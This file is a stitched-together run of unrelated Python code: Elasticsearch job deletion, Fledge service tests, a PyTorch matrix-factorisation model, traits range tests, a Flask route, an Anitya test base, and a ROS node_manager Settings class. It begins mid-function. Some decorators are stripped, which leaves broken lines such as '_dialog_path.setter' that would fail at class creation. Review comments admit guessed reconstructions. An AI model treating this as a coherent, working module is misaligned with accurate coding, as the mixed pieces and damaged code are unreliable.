            client_error(f'Unknown ML job type: {job_type}')
    except (elasticsearch.NotFoundError, elasticsearch.ConflictError) as e:
        client_error(str(e), e, ctx=ctx)
    if verbose:
        click.echo(f'Deleted {job_type} job: {job_name}')
class TestStartStopNotificationService:
    """End-to-end checks for stopping and restarting the notification service."""

    def test_shutdown_service_with_schedule_disable(self, fledge_url, disable_schedule, wait_time):
        """Disabling the schedule shuts the service down and audits NTFSD once."""
        disable_schedule(fledge_url, SERVICE_NAME)
        pause_for_x_seconds(x=wait_time)
        _verify_service(fledge_url, status='shutdown')
        # Give the audit log a moment to record the shutdown event.
        pause_for_x_seconds(x=wait_time)
        _verify_audit_log_entry(fledge_url, '/fledge/audit?source=NTFSD', name=SERVICE_NAME, count=1)

    def test_restart_notification_service(self, fledge_url, enable_schedule, wait_time):
        """Re-enabling the schedule brings the service back (second NTFST entry)."""
        enable_schedule(fledge_url, SERVICE_NAME)
        pause_for_x_seconds(x=wait_time)
        _verify_service(fledge_url, status='running')
        _verify_audit_log_entry(fledge_url, '/fledge/audit?source=NTFST', name=SERVICE_NAME, count=2)
class MFBias(nn.Module):
    """Matrix factorization with per-product and global bias terms.

    A product pair is scored by the sigmoid of (dot product of the two
    product embeddings + both per-product biases + a global bias).
    """

    def __init__(self, emb_size, emb_dim, c_vector=1e-06, c_bias=1e-06):
        super().__init__()
        # Hyper-parameters: vocabulary size, embedding width, L2 weights.
        self.emb_size = emb_size
        self.emb_dim = emb_dim
        self.c_vector = c_vector
        self.c_bias = c_bias
        self.product_embedding = nn.Embedding(emb_size, emb_dim)
        self.sig = nn.Sigmoid()
        self.product_bias = nn.Embedding(emb_size, 1)
        self.bias = nn.Parameter(torch.ones(1))
        self.bce = nn.BCELoss()
        logger.info('Model initialized: {}'.format(self))

    def forward(self, product1, product2):
        """Return sigmoid-squashed affinity scores for batches of index pairs."""
        left = self.product_embedding(product1)
        right = self.product_embedding(product2)
        dot = torch.sum(left * right, dim=1, dtype=torch.float)
        bias_sum = self.bias + self.product_bias(product1).squeeze() + self.product_bias(product2).squeeze()
        return self.sig(dot + bias_sum)

    def loss(self, pred, label):
        """Binary cross-entropy plus L2 priors on embeddings and product biases."""
        bce_term = self.bce(pred, label)
        l2_vectors = regularize_l2(self.product_embedding.weight) * self.c_vector
        l2_biases = regularize_l2(self.product_bias.weight) * self.c_bias
        return bce_term + l2_vectors + l2_biases
def test_find_repr_is_working_properly(create_ref_test_data, create_maya_env):
    """find_repr('GPU') on a reference must resolve to the GPU repr version."""
    data = create_ref_test_data
    maya_env = create_maya_env
    # Work inside a saved scene, then reference the repr version into it.
    maya_env.save_as(data['asset2_model_take1_v001'])
    ref = maya_env.reference(data['repr_version1'])
    assert data['repr_version1'].absolute_full_path == ref.path
    gpu_repr = ref.find_repr('GPU')
    assert data['repr_version9'].absolute_full_path == gpu_repr.absolute_full_path
class CommonRangeTests(object):
    """Shared assertions for integer range traits; a mixin that expects the
    concrete TestCase to provide `self.model` with the traits under test.

    NOTE(review): the two bare '_numpy' lines were decorators with their
    '@requires' prefix stripped; restored as @requires_numpy — confirm.
    """

    def test_accepts_int(self):
        """Plain ints inside the range are stored as int; out-of-range raises."""
        self.model.percentage = 35
        self.assertIs(type(self.model.percentage), int)
        self.assertEqual(self.model.percentage, 35)
        with self.assertRaises(TraitError):
            self.model.percentage = (- 1)
        with self.assertRaises(TraitError):
            self.model.percentage = 101

    def test_accepts_bool(self):
        """bools are accepted but coerced to plain int (0 / 1)."""
        self.model.percentage = False
        self.assertIs(type(self.model.percentage), int)
        self.assertEqual(self.model.percentage, 0)
        self.model.percentage = True
        self.assertIs(type(self.model.percentage), int)
        self.assertEqual(self.model.percentage, 1)

    def test_rejects_bad_types(self):
        """Strings, bytes, complex, containers, floats and None all raise and
        leave the previous value untouched."""
        non_integers = ['not a number', '', b'not a number', '3.5', '3', (3 + 4j), 0j, [1.2], (1.2,), 0.0, (- 27.8), 35.0, None]
        for non_integer in non_integers:
            self.model.percentage = 73
            with self.assertRaises(TraitError):
                self.model.percentage = non_integer
            self.assertEqual(self.model.percentage, 73)

    @requires_numpy
    def test_accepts_numpy_types(self):
        """numpy integer scalars are accepted and coerced to plain int."""
        numpy_values = [numpy.uint8(25), numpy.uint16(25), numpy.uint32(25), numpy.uint64(25), numpy.int8(25), numpy.int16(25), numpy.int32(25), numpy.int64(25)]
        for numpy_value in numpy_values:
            self.model.percentage = numpy_value
            self.assertIs(type(self.model.percentage), int)
            self.assertEqual(self.model.percentage, 25)

    @requires_numpy
    def test_rejects_numpy_types(self):
        """numpy float scalars are rejected; previous value is kept."""
        numpy_values = [numpy.float16(25), numpy.float32(25), numpy.float64(25)]
        for numpy_value in numpy_values:
            self.model.percentage = 88
            with self.assertRaises(TraitError):
                self.model.percentage = numpy_value
            self.assertEqual(self.model.percentage, 88)

    def test_accepts_int_subclass(self):
        """int subclasses are accepted (stored as plain int) with range checks."""
        self.model.percentage = InheritsFromInt(44)
        self.assertIs(type(self.model.percentage), int)
        self.assertEqual(self.model.percentage, 44)
        with self.assertRaises(TraitError):
            self.model.percentage = InheritsFromInt((- 1))
        with self.assertRaises(TraitError):
            self.model.percentage = InheritsFromInt(101)

    def test_accepts_int_like(self):
        """Objects implementing the int protocol are accepted with range checks."""
        self.model.percentage = IntLike(35)
        self.assertIs(type(self.model.percentage), int)
        self.assertEqual(self.model.percentage, 35)
        with self.assertRaises(TraitError):
            self.model.percentage = IntLike((- 1))
        with self.assertRaises(TraitError):
            self.model.percentage = IntLike(101)

    def test_bad_int_like(self):
        """Errors raised during int conversion propagate unchanged."""
        with self.assertRaises(ZeroDivisionError):
            self.model.percentage = BadIntLike()

    def test_endpoints(self):
        """Open endpoints exclude their bound; closed endpoints include it."""
        # Mid-range values are fine for every variant.
        self.model.open = self.model.closed = 50
        self.model.open_closed = self.model.closed_open = 50
        self.assertEqual(self.model.open, 50)
        self.assertEqual(self.model.closed, 50)
        self.assertEqual(self.model.open_closed, 50)
        self.assertEqual(self.model.closed_open, 50)
        # Lower bound: allowed only where the low end is closed.
        self.model.closed = self.model.closed_open = 0
        self.assertEqual(self.model.closed, 0)
        self.assertEqual(self.model.closed_open, 0)
        with self.assertRaises(TraitError):
            self.model.open = 0
        with self.assertRaises(TraitError):
            self.model.open_closed = 0
        # Upper bound: allowed only where the high end is closed.
        self.model.closed = self.model.open_closed = 100
        self.assertEqual(self.model.closed, 100)
        self.assertEqual(self.model.open_closed, 100)
        with self.assertRaises(TraitError):
            self.model.open = 100
        with self.assertRaises(TraitError):
            self.model.closed_open = 100

    def test_half_infinite(self):
        """Ranges bounded on one side accept arbitrarily large/small values on
        the unbounded side and reject values past the bounded side."""
        ice_temperatures = [(- 273), (- 100), (- 1)]
        water_temperatures = [1, 50, 99]
        steam_temperatures = [101, 1000, (10 ** 100), (10 ** 1000)]
        for temperature in steam_temperatures:
            self.model.steam_temperature = temperature
            self.assertEqual(self.model.steam_temperature, temperature)
        for temperature in (ice_temperatures + water_temperatures):
            self.model.steam_temperature = 1729
            with self.assertRaises(TraitError):
                self.model.steam_temperature = temperature
            self.assertEqual(self.model.steam_temperature, 1729)
        for temperature in ice_temperatures:
            self.model.ice_temperature = temperature
            self.assertEqual(self.model.ice_temperature, temperature)
        for temperature in (water_temperatures + steam_temperatures):
            self.model.ice_temperature = (- 1729)
            with self.assertRaises(TraitError):
                self.model.ice_temperature = temperature
            self.assertEqual(self.model.ice_temperature, (- 1729))
@flask_app.route('/history')
@flask_app.route('/history/<game_id>')
@flask_app.route('/checkversion/<version>/history')
@flask_app.route('/checkversion/<version>/history/<game_id>')
def history_page(game_id='', version=None):
    """Render the event-history page for a game (404 page if no game matches).

    NOTE(review): the four route lines lost their '@' and the Flask app
    object's name fragment ('_app.route'); reconstructed as `flask_app` —
    confirm the app object's actual name.
    """
    show_old_version_notice = ((version is not None) and utils.is_old_version(version))
    matches = datamodel.get_known_games(game_id)
    if not matches:
        logger.warning(f'Could not find a game matching {game_id}')
        return render_template('404_page.html', game_not_found=True, game_name=game_id)
    # Use the best match; look up its display country.
    game_id = matches[0]
    games_dict = datamodel.get_available_games_dict()
    country = games_dict[game_id]['country_name']
    event_filter = get_event_filter()
    with datamodel.get_db_session(game_id) as session:
        dict_builder = EventTemplateDictBuilder(session, game_id, event_filter)
        (events, title, details, links) = dict_builder.get_event_and_link_dicts()
        wars = dict_builder.get_war_list()
    return render_template('history_page.html', game_name=game_id, country=country, wars=wars, events=events, details=details, links=links, title=title, is_filtered_page=(not event_filter.is_empty_filter), show_old_version_notice=show_old_version_notice, version=utils.VERSION, update_version_id=version)
class AnityaTestCase(unittest.TestCase):
    """Base test case: builds a testing Flask app and replays HTTP traffic
    through per-test VCR cassettes."""

    def setUp(self):
        self.config = config.config.copy()
        self.config['TESTING'] = True
        self.flask_app = app.create(self.config)
        cwd = os.path.dirname(os.path.realpath(__file__))
        # Cassettes live next to the tests; 'once' records on first run and
        # replays on subsequent runs.
        my_vcr = vcr.VCR(cassette_library_dir=os.path.join(cwd, 'request-data/'), record_mode='once', decode_compressed_response=True)
        # One cassette per test (self.id()); auth headers are filtered so
        # real tokens never end up on disk.
        self.vcr = my_vcr.use_cassette(self.id(), filter_headers=[('Authorization', 'bearer foobar')])
        self.vcr.__enter__()
        # Ensure the cassette is closed even if the test errors out.
        self.addCleanup(self.vcr.__exit__, None, None, None)
class Settings(object):
    """Persistent configuration for the Node Manager GUI.

    Wraps an ini file (QSettings) under ``~/.config/ros.fkie/node_manager/``
    and exposes every stored option as a plain attribute via
    ``__getattr__``/``__setattr__``, driven by the metadata dictionary built
    in :meth:`_load_settings` (keys ``:var``, ``:value``, ``:default``, ...).
    """
    PKG_NAME = 'fkie_node_manager'
    # Locate the package directory; fall back to a path relative to this file
    # when roslib cannot resolve the package (e.g. run from the source tree).
    try:
        PACKAGE_DIR = roslib.packages.get_pkg_dir(PKG_NAME)
    except Exception:
        PACKAGE_DIR = ('%s/../..' % os.path.realpath(os.path.dirname(__file__)))
    if ('dist-packages' in __file__):
        # Installed system-wide: data files live under share/.
        PACKAGE_DIR = ('%s/../../share/fkie_node_manager' % PACKAGE_DIR)
    print(('PACKAGE_DIR: %s' % PACKAGE_DIR))
    CFG_PATH = os.path.expanduser('~/.config/ros.fkie/node_manager/')
    HELP_FILE = os.path.join(PACKAGE_DIR, 'doc/index.rst')
    CURRENT_DIALOG_PATH = os.path.expanduser('~')
    LOG_PATH = screen.LOG_PATH
    LOG_VIEWER = '/usr/bin/less -fKLnQrSU'
    STARTER_SCRIPT = 'rosrun fkie_node_manager remote_nm.py'
    LAUNCH_HISTORY_FILE = 'launch.history'
    PARAM_HISTORY_FILE = 'param.history'
    CFG_FILE = 'settings.ini'
    CFG_GUI_FILE = 'settings.ini'
    TIMEOUT_CONTROL = 5
    TIMEOUT_UPDATES = 20
    SEARCH_IN_EXT = ['.launch', '.yaml', '.conf', '.cfg', '.iface', '.nmprofile', '.sync', '.test', '.xml', '.xacro']
    LAUNCH_VIEW_EXT = ['.launch', '.yaml', '.conf', '.cfg', '.iface', '.nmprofile', '.sync', '.test', '.xacro']
    # NOTE: 'DEAFULT' is a long-standing typo for 'DEFAULT' (kept for
    # compatibility); the full palette is filled in by init_hosts_color_list().
    DEAFULT_HOST_COLORS = [QColor(255, 255, 235).rgb()]

    def __init__(self):
        # Metadata dictionary of all options; see _load_settings().
        self._data = {}
        self.reload()

    def reload(self):
        """(Re)load all settings from the ini file and reset cached state."""
        self._terminal_emulator = None
        self._terminal_command_arg = 'e'
        self._noclose_str = ''
        self._terminal_title = '-T'
        self._masteruri = masteruri_from_ros()
        self.CFG_PATH = os.path.expanduser('~/.config/ros.fkie/node_manager/')
        if (not os.path.isdir(self.CFG_PATH)):
            os.makedirs(self.CFG_PATH)
        self.cfg_path = self.CFG_PATH
        # Best-effort migration of an old configuration directory located
        # under get_ros_home(); failures are deliberately ignored.
        try:
            import shutil
            old_cfg_path = os.path.join(get_ros_home(), 'node_manager')
            if os.path.exists(old_cfg_path):
                print(('move configuration to new destination: %s' % self.CFG_PATH))
                for filename in os.listdir(old_cfg_path):
                    shutil.move(os.path.join(old_cfg_path, filename), os.path.join(self.CFG_PATH, filename))
                shutil.rmtree(old_cfg_path)
        except Exception:
            pass
        print(('Configuration path: %s' % self.CFG_PATH))
        settings = self.qsettings(self.CFG_FILE)
        self._data = self._load_settings(settings)
        # Per-host ssh user overrides stored in the 'default_user_hosts' group.
        settings.beginGroup('default_user_hosts')
        self._default_user_hosts = dict()
        for k in settings.childKeys():
            self._default_user_hosts[k] = settings.value(k, self.default_user)
        settings.endGroup()
        self._current_dialog_path = self.CURRENT_DIALOG_PATH
        self._log_viewer = self.LOG_VIEWER
        self._start_remote_script = self.STARTER_SCRIPT
        # Merge user-configured view extensions into the search extensions.
        self.SEARCH_IN_EXT = list((set(self.SEARCH_IN_EXT) | set(self.str2list(self.launch_view_file_ext))))
        self._rosconsole_cfg_file = 'rosconsole.config'
        self.logging = LoggingConfig()
        self.logging.loglevel = settings.value('logging/level', LoggingConfig.LOGLEVEL)
        self.logging.loglevel_roscpp = settings.value('logging/level_roscpp', LoggingConfig.LOGLEVEL_ROSCPP)
        self.logging.loglevel_superdebug = settings.value('logging/level_superdebug', LoggingConfig.LOGLEVEL_SUPERDEBUG)
        self.logging.console_format = settings.value('logging/rosconsole_format', LoggingConfig.CONSOLE_FORMAT)
        nmd_settings.GRPC_TIMEOUT = self.timeout_grpc
        # Manually assigned host colors (see host_color()/set_host_color()).
        settings.beginGroup('host_colors')
        self._host_colors = dict()
        for k in settings.childKeys():
            self._host_colors[k] = settings.value(k, None)
        settings.endGroup()
        self.init_hosts_color_list()
        # Lazily populated by launch_history().
        self._launch_history = None
        self._icons_dir = os.path.join(os.path.dirname(__file__), 'icons')

    # NOTE(review): presumably decorated with @property upstream (extraction
    # appears to have stripped decorators in this file) -- TODO confirm.
    def masteruri(self):
        return self._masteruri

    def _load_settings(self, settings):
        """Build the option-metadata dictionary from the given QSettings.

        Each entry maps a human-readable label to a dict with the stored
        value (``:value``), attribute name (``:var``), default, and optional
        UI hints (``:hint``, ``:min``/``:max``, ``:need_restart``, ...).
        """
        result = {'reset': {':value': False, ':var': 'reset', ':hint': 'if this flag is set to True the configuration will be reseted.'}, 'reset_cache': {':value': False, ':var': 'reset_cache', ':hint': 'if this flag is set to True cached values will be removed.'}, 'Default user:': {':value': settings.value('default_user', 'robot'), ':var': 'default_user', ':default': 'robot', ':hint': 'The user used for ssh connection to remote hosts if no one is set for specific master. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Launch history length:': {':value': int(settings.value('launch_history_length', 5)), ':var': 'launch_history_length', ':default': 5, ':min': 0, ':max': 25, ':hint': 'The count of recent loaded launch files displayed in the root of the <span style="font-weight:600;">launch files</span> view.'}, 'Param history length:': {':value': int(settings.value('param_history_length', 12)), ':var': 'param_history_length', ':default': 12, ':min': 0, ':max': 25, ':hint': 'The count of parameters stored which are entered in a parameter dialog (Launch file arguments, parameter server, publishing to a topic, service call)'}, 'Settings path:': {':value': settings.value('cfg_path', self.CFG_PATH), ':var': 'cfg_path', ':path': 'dir', ':default': self.CFG_PATH, ':hint': '', ':ro': True}, 'Robot icon path:': {':value': os.path.join(self.PACKAGE_DIR, 'images'), ':var': 'robots_path', ':path': 'dir', ':default': os.path.join(self.PACKAGE_DIR, 'images'), ':hint': 'The path to the folder with robot images(<span style=" font-weight:600;">.png</span>). 
The images with robot name will be displayed in the info bar.'}, 'Show files extensions:': {':value': settings.value('launch_view_file_ext', ', '.join(self.LAUNCH_VIEW_EXT)), ':var': 'launch_view_file_ext', ':default': ', '.join(self.LAUNCH_VIEW_EXT), ':return_type': 'list', ':hint': 'Files that are displayed next to Launch files in the <span style="font-weight:600;">launch files</span> view.'}, 'Store window layout:': {':value': self.str2bool(settings.value('store_geometry', True)), ':var': 'store_geometry', ':default': True, ':hint': ''}, 'Movable dock widgets:': {':value': self.str2bool(settings.value('movable_dock_widgets', True)), ':var': 'movable_dock_widgets', ':default': True, ':hint': 'On false you can\'t reorganize docking widgets. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Max time difference:': {':value': float(settings.value('max_timediff', 0.5)), ':var': 'max_timediff', ':default': 0.5, ':step': 0.1, ':hint': 'Shows a warning if the time difference to remote host is greater than this value.'}, 'Autoupdate:': {':value': self.str2bool(settings.value('autoupdate', True)), ':var': 'autoupdate', ':default': True, ':hint': 'By default node manager updates the current state on changes. You can deactivate this behavior to reduce the network load. 
If autoupdate is deactivated you must refresh the state manually.'}, 'Start sync with discovery:': {':value': self.str2bool(settings.value('start_sync_with_discovery', False)), ':var': 'start_sync_with_discovery', ':default': False, ':hint': "Sets 'start sync' in 'Start' master discoverydialog to True, if this option is set to true."}, 'Start daemon with discovery:': {':value': self.str2bool(settings.value('start_daemon_with_discovery', False)), ':var': 'start_daemon_with_discovery', ':default': False, ':hint': "Sets 'start daemons' in 'Start' master discoverydialog to True, if this option is set to true."}, 'Confirm exit when closing:': {':value': self.str2bool(settings.value('confirm_exit_when_closing', True)), ':var': 'confirm_exit_when_closing', ':default': True, ':hint': 'Shows on closing of node_manager a dialog to stop all ROS nodes if this option is set to true.'}, 'Highlight xml blocks:': {':value': self.str2bool(settings.value('highlight_xml_blocks', True)), ':var': 'highlight_xml_blocks', ':default': True, ':hint': 'Highlights the current selected XML block, while editing ROS launch file.'}, 'Colorize hosts:': {':value': self.str2bool(settings.value('colorize_hosts', True)), ':var': 'colorize_hosts', ':default': True, ':hint': ('Determine automatic a default color for each host if True. Manually setting color will be preferred. You can select the color by double-click on hostname in description panel. To remove a setting color delete it manually from %s' % self.CFG_PATH)}, 'Check for nodelets at start:': {':value': self.str2bool(settings.value('check_for_nodelets_at_start', True)), ':var': 'check_for_nodelets_at_start', ':default': True, ':hint': 'Test the starting nodes for nodelet manager and all nodelets. 
If one of the nodes is not in the list a dialog is displayed with proposal to start other nodes, too.'}, 'Show noscreen error:': {':value': self.str2bool(settings.value('show_noscreen_error', True)), ':var': 'show_noscreen_error', ':default': True, ':hint': 'Shows an error if requested screen for a node is not available.'}, 'Autoreload changed launch files:': {':value': self.str2bool(settings.value('autoreload_launch', False)), ':var': 'autoreload_launch', ':default': False, ':hint': 'On change asks for reload launch file. On True reload without asking.'}, 'Show domain suffix:': {':value': self.str2bool(settings.value('show_domain_suffix', False)), ':var': 'show_domain_suffix', ':default': False, ':hint': 'Shows the domain suffix of the host in the host description panel and node tree view.'}, 'Transpose pub/sub description:': {':value': self.str2bool(settings.value('transpose_pub_sub_descr', True)), ':var': 'transpose_pub_sub_descr', ':default': True, ':hint': 'Transpose publisher/subscriber in description dock.'}, 'Timeout close dialog:': {':value': float(settings.value('timeout_close_dialog', 30.0)), ':var': 'timeout_close_dialog', ':default': 30.0, ':step': 1.0, ':hint': 'Timeout in seconds to close dialog while closing Node Manager. 0 disables autoclose functionality.'}, 'Group nodes by namespace:': {':value': self.str2bool(settings.value('group_nodes_by_namespace', True)), ':var': 'group_nodes_by_namespace', ':default': True, ':hint': 'Split namespace of the node by / and create groups for each name part. 
<span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Timeout for GRPC requests:': {':value': float(settings.value('timeout_grpc', nmd_settings.GRPC_TIMEOUT)), ':var': 'timeout_grpc', ':default': nmd_settings.GRPC_TIMEOUT, ':step': 1.0, ':hint': 'Timeout in seconds for GRPC requests to daemon.'}, 'Sysmon default interval:': {':value': int(settings.value('sysmon_default_interval', 10)), ':var': 'sysmon_default_interval', ':default': 10, ':step': 1, ':hint': 'Interval in seconds to get system monitor diagnostics from each remote host. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Use /diagnostigs_agg:': {':value': self.str2bool(settings.value('use_diagnostics_agg', False)), ':var': 'use_diagnostics_agg', ':default': False, ':hint': 'subscribes to \'/diagnostics_agg\' topic instead of \'/diagnostics\'. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Use internal log widget:': {':value': self.str2bool(settings.value('use_internal_log_widget', True)), ':var': 'use_internal_log_widget', ':default': False, ':hint': 'Opens the log file in internal dock instead of new terminal. If deactivated still accessible with Ctrl modifier.', ':need_restart': False}}
        return result

    def yaml(self):
        """Return the raw option-metadata dictionary (for the settings dialog)."""
        return self._data

    def set_yaml(self, data):
        """Apply an edited option-metadata dictionary back to this object.

        Handles the pseudo options 'reset' (wipe config files and reload) and
        'reset_cache' (delete the launch/param history files), and informs the
        user when a changed option requires an application restart.
        """
        reset = False
        reset_cache = False
        need_restart = False
        for value in data.values():
            # __setattr__ persists each changed value to the ini file.
            setattr(self, value[':var'], value[':value'])
            if (':need_restart' in value):
                if value[':need_restart']:
                    need_restart = True
            if (value[':var'] == 'reset'):
                reset = value[':value']
            if (value[':var'] == 'reset_cache'):
                reset_cache = value[':value']
        if need_restart:
            MessageBox.information(None, 'restart Node Manager', 'Some of modified parameter requires a restart of Node Manager!')
        if reset:
            try:
                os.remove(os.path.join(self.CFG_PATH, self.CFG_FILE))
                os.remove(os.path.join(self.CFG_PATH, self.CFG_GUI_FILE))
            except Exception:
                pass
            self.reload()
        if reset_cache:
            try:
                os.remove(os.path.join(self.CFG_PATH, self.LAUNCH_HISTORY_FILE))
                os.remove(os.path.join(self.CFG_PATH, self.PARAM_HISTORY_FILE))
            except Exception:
                pass

    def __getattr__(self, name):
        """Resolve unknown attributes from the option metadata (``:var`` keys).

        Values flagged with ``:return_type == 'list'`` are converted from
        their stored string form via str2list().
        """
        for value in self._data.values():
            if (value[':var'] == name):
                if (':return_type' in value):
                    if (value[':return_type'] == 'list'):
                        return self.str2list(value[':value'])
                return value[':value']
        raise AttributeError(("'Settings' has no attribute '%s'" % name))

    def __setattr__(self, name, value):
        """Set an attribute; known option names are also persisted to the ini.

        Directory-typed options (':path' == 'dir') are normalized to an
        absolute path without a trailing separator; 'cfg_path' is created on
        demand.
        """
        if (name == '_data'):
            # No early return here: after (re)binding _data the loop below
            # runs over the fresh dictionary (a no-op for an empty dict).
            object.__setattr__(self, name, value)
        for val in self._data.values():
            if (val[':var'] == name):
                setval = value
                val[':value'] = setval
                if (':path' in val):
                    if (val[':path'] == 'dir'):
                        setval = os.path.abspath(setval).rstrip(os.path.sep)
                        val[':value'] = setval
                        if (name == 'cfg_path'):
                            if (not os.path.isdir(setval)):
                                os.makedirs(setval)
                settings = self.qsettings(self.CFG_FILE)
                settings.setValue(name, setval)
                return
        object.__setattr__(self, name, value)

    def icon_path(self, name):
        """Return the absolute path of the icon file *name*."""
        return os.path.join(self._icons_dir, name)

    def icon(self, name):
        """Return the icon *name* as QIcon."""
        return QIcon(self.icon_path(name))

    def image(self, name):
        """Return the icon *name* as QImage."""
        return QImage(self.icon_path(name))

    def pixmap(self, name):
        """Return the icon *name* as QPixmap."""
        return QPixmap(self.icon_path(name))

    def host_user(self, host):
        """Return the configured ssh user for *host*, or the default user."""
        if (host in self._default_user_hosts):
            return self._default_user_hosts[host]
        return self.default_user

    def set_host_user(self, host, user):
        """Store the ssh *user* for *host* (ignored if either is empty)."""
        if (host and user):
            self._default_user_hosts[host] = user
            settings = self.qsettings(self.CFG_FILE)
            settings.setValue(('default_user_hosts/%s' % host), user)

    def current_dialog_path(self):
        return self._current_dialog_path

    # NOTE(review): bare expression below looks like a stripped decorator
    # (likely '@current_dialog_path.setter', with '@property' on the getter
    # above) -- extraction artifact; as written it raises NameError at class
    # creation time. TODO confirm against upstream.
    _dialog_path.setter
    def current_dialog_path(self, path):
        self._current_dialog_path = path

    def robot_image_file(self, robot_name):
        """Return the path of the robot image '<robots_path>/<robot_name>.png'."""
        return os.path.join(self.robots_path, ('%s.png' % robot_name))

    def log_viewer(self):
        return self._log_viewer

    # NOTE(review): likely a stripped '@log_viewer.setter' -- see note above.
    _viewer.setter
    def log_viewer(self, viewer):
        self._log_viewer = viewer

    def start_remote_script(self):
        return self._start_remote_script

    # NOTE(review): likely a stripped '@start_remote_script.setter'.
    _remote_script.setter
    def start_remote_script(self, script):
        self._start_remote_script = script

    def rosconsole_cfg_file(self, package):
        """Write and return a per-package rosconsole (log4j) config file.

        The file is (re)written into LOG_PATH with the currently configured
        log levels on every call.
        """
        result = os.path.join(self.LOG_PATH, ('%s.%s' % (package, self._rosconsole_cfg_file)))
        with open(result, 'w') as cfg_file:
            cfg_file.write(('log4j.logger.ros=%s\n' % self.logging.loglevel))
            cfg_file.write(('log4j.logger.ros.roscpp=%s\n' % self.logging.loglevel_roscpp))
            cfg_file.write(('log4j.logger.ros.roscpp.superdebug=%s\n' % self.logging.loglevel_superdebug))
        return result

    def store_logging(self):
        """Persist the current logging configuration to the ini file."""
        settings = self.qsettings(self.CFG_FILE)
        settings.setValue('logging/level', self.logging.loglevel)
        settings.setValue('logging/level_roscpp', self.logging.loglevel_roscpp)
        settings.setValue('logging/level_superdebug', self.logging.loglevel_superdebug)
        settings.setValue('logging/rosconsole_format', self.logging.console_format)

    def host_color(self, host, default_color):
        """Return the display color for *host*.

        Manually assigned colors win; otherwise a stable color is picked from
        the palette using an md5 hash of the host name. Returns
        *default_color* when host colorization is disabled.
        """
        if self.colorize_hosts:
            if (host in self._host_colors):
                result = self._host_colors[host]
                # Values read back from QSettings may be strings.
                if isstring(result):
                    return int(result)
                return result
            else:
                hash_str = hashlib.md5(host.encode('utf-8')).hexdigest()
                hash_int = int(hash_str, 16)
                index = (abs(hash_int) % len(self.DEAFULT_HOST_COLORS))
                return self.DEAFULT_HOST_COLORS[index]
        return default_color

    def set_host_color(self, host, color):
        """Store a manual *color* for *host* (ignored if either is falsy)."""
        if (host and color):
            self._host_colors[host] = color
            settings = self.qsettings(self.CFG_FILE)
            settings.setValue(('host_colors/%s' % host), color)

    def launch_history(self):
        """Return the cached launch-file history, loading it on first use."""
        if (self._launch_history is not None):
            return self._launch_history
        result = list()
        history_file = self.qsettings(self.LAUNCH_HISTORY_FILE)
        size = history_file.beginReadArray('launch_history')
        for i in range(size):
            history_file.setArrayIndex(i)
            # Honor a possibly reduced history length setting.
            if (i >= self.launch_history_length):
                break
            launch_file = history_file.value('file')
            result.append(launch_file)
        history_file.endArray()
        self._launch_history = result
        return self._launch_history

    def launch_history_add(self, path, replace=None):
        """Append *path* to the history (replacing *replace* if given)."""
        to_remove = replace
        if (replace is None):
            to_remove = path
        if (self._launch_history is None):
            # NOTE(review): bare attribute access -- presumably
            # 'launch_history' was a @property upstream; as a plain method
            # this line does not populate the cache. TODO confirm.
            self.launch_history
        try:
            self._launch_history.remove(to_remove)
        except Exception:
            pass
        self._launch_history.append(path)
        # Trim the oldest entries down to the configured length.
        while (len(self._launch_history) > self.launch_history_length):
            self._launch_history.pop(0)
        self._launch_history_save(self._launch_history)

    def launch_history_remove(self, path):
        """Remove *path* from the history; silently ignore unknown paths."""
        try:
            self._launch_history.remove(path)
            self._launch_history_save(self._launch_history)
        except Exception:
            pass

    def _launch_history_save(self, paths):
        """Write *paths* to the history file and refresh the cache."""
        history_file = self.qsettings(self.LAUNCH_HISTORY_FILE)
        history_file.beginWriteArray('launch_history')
        for (i, launch_file) in enumerate(paths):
            history_file.setArrayIndex(i)
            history_file.setValue('file', launch_file)
        history_file.endArray()
        self._launch_history = list(paths)

    def str2bool(self, v):
        """Interpret ini string values ('yes', 'true', 't', '1') as booleans."""
        if isinstance(v, bool):
            return v
        return (v.lower() in ('yes', 'true', 't', '1'))

    def str2list(self, lstr):
        """Parse a stored list representation back into a list of strings."""
        if isinstance(lstr, list):
            return lstr
        try:
            # Strip the repr()-style decoration and split on whitespace.
            lstr = lstr.strip('[]')
            lstr = lstr.replace('u"', '')
            lstr = lstr.replace('"', '')
            lstr = lstr.replace("'", '')
            lstr = lstr.replace(',', ' ')
            return [utf8(i).strip() for i in lstr.split(' ') if i]
        except Exception:
            return []

    def terminal_cmd(self, cmd, title, noclose=False):
        """Build a shell command that runs *cmd* in a new terminal window.

        Probes a list of known terminal emulators and adapts the command-line
        flags (title flag, execute flag, keep-open option) to the one found.
        Raises Exception if no terminal emulator is installed.
        """
        terminal_emulator = ''
        terminal_title = self._terminal_title
        noclose_str = self._noclose_str
        terminal_command_arg = self._terminal_command_arg
        for t in ['/usr/bin/x-terminal-emulator', '/usr/bin/xterm', '/opt/x11/bin/xterm']:
            if (os.path.isfile(t) and os.access(t, os.X_OK)):
                # Resolve the symlink to learn which emulator is behind it.
                print(os.path.basename(os.path.realpath(t)))
                if (os.path.basename(os.path.realpath(t)) in ['terminator', 'gnome-terminal', 'xfce4-terminal']):
                    terminal_command_arg = 'x'
                else:
                    terminal_command_arg = 'e'
                if (os.path.basename(os.path.realpath(t)) in ['terminator', 'gnome-terminal', 'gnome-terminal.wrapper']):
                    noclose_str = '--profile hold'
                    if noclose:
                        rospy.loginfo("If your terminal close after the execution, you can change this behavior in profiles. You can also create a profile with name 'hold'. This profile will be then load by node_manager.")
                elif (os.path.basename(os.path.realpath(t)) in ['xfce4-terminal', 'xterm', 'lxterm', 'uxterm']):
                    noclose_str = ''
                    terminal_title = '-T'
                terminal_emulator = t
                break
        if (terminal_emulator == ''):
            raise Exception("No Terminal found! Please install one of ['/usr/bin/x-terminal-emulator', '/usr/bin/xterm', '/opt/x11/bin/xterm']")
        noclose_str = (noclose_str if noclose else '')
        title_opt = ''
        if title:
            title_opt = ('%s "%s"' % (terminal_title, title))
        return ('%s %s %s -%s %s' % (terminal_emulator, title_opt, noclose_str, terminal_command_arg, ' '.join(cmd)))

    def qsettings(self, settings_file):
        """Return a QSettings for *settings_file* (relative names resolve to CFG_PATH)."""
        path = settings_file
        if (not settings_file.startswith(os.path.sep)):
            path = os.path.join(self.CFG_PATH, settings_file)
